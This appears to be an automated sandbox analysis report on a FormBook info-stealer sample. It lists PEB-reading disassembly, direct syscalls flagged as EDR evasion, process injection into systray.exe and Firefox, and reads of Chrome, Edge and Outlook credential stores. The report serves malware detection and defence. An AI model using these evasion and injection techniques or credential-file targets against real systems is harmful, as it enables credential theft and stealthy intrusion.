Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAAAEE mov eax, dword ptr fs:[00000030h] 3_2_00FAAAEE
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FAAAEE mov eax, dword ptr fs:[00000030h] 3_2_00FAAAEE
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70AD0 mov eax, dword ptr fs:[00000030h] 3_2_00F70AD0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA4AD0 mov eax, dword ptr fs:[00000030h] 3_2_00FA4AD0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA4AD0 mov eax, dword ptr fs:[00000030h] 3_2_00FA4AD0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01038B28 mov eax, dword ptr fs:[00000030h] 3_2_01038B28
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01038B28 mov eax, dword ptr fs:[00000030h] 3_2_01038B28
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 3_2_00FC6ACC
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 3_2_00FC6ACC
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 3_2_00FC6ACC
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01006B40 mov eax, dword ptr fs:[00000030h] 3_2_01006B40
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01006B40 mov eax, dword ptr fs:[00000030h] 3_2_01006B40
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0103AB40 mov eax, dword ptr fs:[00000030h] 3_2_0103AB40
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01018B42 mov eax, dword ptr fs:[00000030h] 3_2_01018B42
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01024B4B mov eax, dword ptr fs:[00000030h] 3_2_01024B4B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01024B4B mov eax, dword ptr fs:[00000030h] 3_2_01024B4B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101EB50 mov eax, dword ptr fs:[00000030h] 3_2_0101EB50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01042B57 mov eax, dword ptr fs:[00000030h] 3_2_01042B57
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01042B57 mov eax, dword ptr fs:[00000030h] 3_2_01042B57
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01042B57 mov eax, dword ptr fs:[00000030h] 3_2_01042B57
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01042B57 mov eax, dword ptr fs:[00000030h] 3_2_01042B57
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F78AA0 mov eax, dword ptr fs:[00000030h] 3_2_00F78AA0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F78AA0 mov eax, dword ptr fs:[00000030h] 3_2_00F78AA0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FC6AA4 mov eax, dword ptr fs:[00000030h] 3_2_00FC6AA4
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA8A90 mov edx, dword ptr fs:[00000030h] 3_2_00FA8A90
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 3_2_00F7EA80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FECA72 mov eax, dword ptr fs:[00000030h] 3_2_00FECA72
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FECA72 mov eax, dword ptr fs:[00000030h] 3_2_00FECA72
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FACA6F mov eax, dword ptr fs:[00000030h] 3_2_00FACA6F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FACA6F mov eax, dword ptr fs:[00000030h] 3_2_00FACA6F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FACA6F mov eax, dword ptr fs:[00000030h] 3_2_00FACA6F
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80A5B mov eax, dword ptr fs:[00000030h] 3_2_00F80A5B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80A5B mov eax, dword ptr fs:[00000030h] 3_2_00F80A5B
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h] 3_2_00F76A50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h] 3_2_00F76A50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h] 3_2_00F76A50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h] 3_2_00F76A50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h] 3_2_00F76A50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h] 3_2_00F76A50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F76A50 mov eax, dword ptr fs:[00000030h] 3_2_00F76A50
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01024BB0 mov eax, dword ptr fs:[00000030h] 3_2_01024BB0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01024BB0 mov eax, dword ptr fs:[00000030h] 3_2_01024BB0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FACA38 mov eax, dword ptr fs:[00000030h] 3_2_00FACA38
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F94A35 mov eax, dword ptr fs:[00000030h] 3_2_00F94A35
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F94A35 mov eax, dword ptr fs:[00000030h] 3_2_00F94A35
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101EBD0 mov eax, dword ptr fs:[00000030h] 3_2_0101EBD0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9EA2E mov eax, dword ptr fs:[00000030h] 3_2_00F9EA2E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FACA24 mov eax, dword ptr fs:[00000030h] 3_2_00FACA24
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFCA11 mov eax, dword ptr fs:[00000030h] 3_2_00FFCA11
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9EBFC mov eax, dword ptr fs:[00000030h] 3_2_00F9EBFC
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 3_2_00F78BF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 3_2_00F78BF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 3_2_00F78BF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FFCBF0 mov eax, dword ptr fs:[00000030h] 3_2_00FFCBF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F90BCB mov eax, dword ptr fs:[00000030h] 3_2_00F90BCB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F90BCB mov eax, dword ptr fs:[00000030h] 3_2_00F90BCB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F90BCB mov eax, dword ptr fs:[00000030h] 3_2_00F90BCB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70BCD mov eax, dword ptr fs:[00000030h] 3_2_00F70BCD
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70BCD mov eax, dword ptr fs:[00000030h] 3_2_00F70BCD
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F70BCD mov eax, dword ptr fs:[00000030h] 3_2_00F70BCD
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80BBE mov eax, dword ptr fs:[00000030h] 3_2_00F80BBE
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F80BBE mov eax, dword ptr fs:[00000030h] 3_2_00F80BBE
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_0101EA60 mov eax, dword ptr fs:[00000030h] 3_2_0101EA60
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_01044A80 mov eax, dword ptr fs:[00000030h] 3_2_01044A80
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6CB7E mov eax, dword ptr fs:[00000030h] 3_2_00F6CB7E
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9EB20 mov eax, dword ptr fs:[00000030h] 3_2_00F9EB20
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F9EB20 mov eax, dword ptr fs:[00000030h] 3_2_00F9EB20
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FEEB1D mov eax, dword ptr fs:[00000030h] 3_2_00FEEB1D
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA2CF0 mov eax, dword ptr fs:[00000030h] 3_2_00FA2CF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FA2CF0 mov eax, dword ptr fs:[00000030h] 3_2_00FA2CF0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtCreateMutant: Direct from: 0x774635CC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtWriteVirtualMemory: Direct from: 0x77462E3C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtMapViewOfSection: Direct from: 0x77462D1C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtResumeThread: Direct from: 0x774636AC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtProtectVirtualMemory: Direct from: 0x77462F9C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtSetInformationProcess: Direct from: 0x77462C5C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtSetInformationThread: Direct from: 0x774563F9 Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtProtectVirtualMemory: Direct from: 0x77457B2E Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtNotifyChangeKey: Direct from: 0x77463C2C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtQueryInformationProcess: Direct from: 0x77462C26 Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtResumeThread: Direct from: 0x77462FBC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtReadFile: Direct from: 0x77462ADC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtQuerySystemInformation: Direct from: 0x77462DFC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtDelayExecution: Direct from: 0x77462DDC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtCreateUserProcess: Direct from: 0x7746371C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtWriteVirtualMemory: Direct from: 0x7746490C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtAllocateVirtualMemory: Direct from: 0x774648EC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtQuerySystemInformation: Direct from: 0x774648CC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtReadVirtualMemory: Direct from: 0x77462E8C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtCreateKey: Direct from: 0x77462C6C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtSetInformationThread: Direct from: 0x77462B4C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtQueryAttributesFile: Direct from: 0x77462E6C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtDeviceIoControlFile: Direct from: 0x77462AEC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtOpenSection: Direct from: 0x77462E0C Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtCreateFile: Direct from: 0x77462FEC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtOpenFile: Direct from: 0x77462DCC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtQueryInformationToken: Direct from: 0x77462CAC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe NtOpenKeyEx: Direct from: 0x77462B9C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory written: C:\Users\user\Desktop\CMV610942X6UI.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: NULL target: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: NULL target: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: NULL target: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 1036 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\systray.exe Thread APC queued: target process: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process created: C:\Users\user\Desktop\CMV610942X6UI.exe "C:\Users\user\Desktop\CMV610942X6UI.exe" Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe" Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: ZkqZZBQxQqm.exe, 00000007.00000000.1716276781.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261286689.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858538109.00000000018E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: ZkqZZBQxQqm.exe, 00000007.00000000.1716276781.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261286689.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858538109.00000000018E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: ZkqZZBQxQqm.exe, 00000007.00000000.1716276781.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261286689.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858538109.00000000018E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
Source: ZkqZZBQxQqm.exe, 00000007.00000000.1716276781.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261286689.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858538109.00000000018E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Queries volume information: C:\Users\user\Desktop\CMV610942X6UI.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
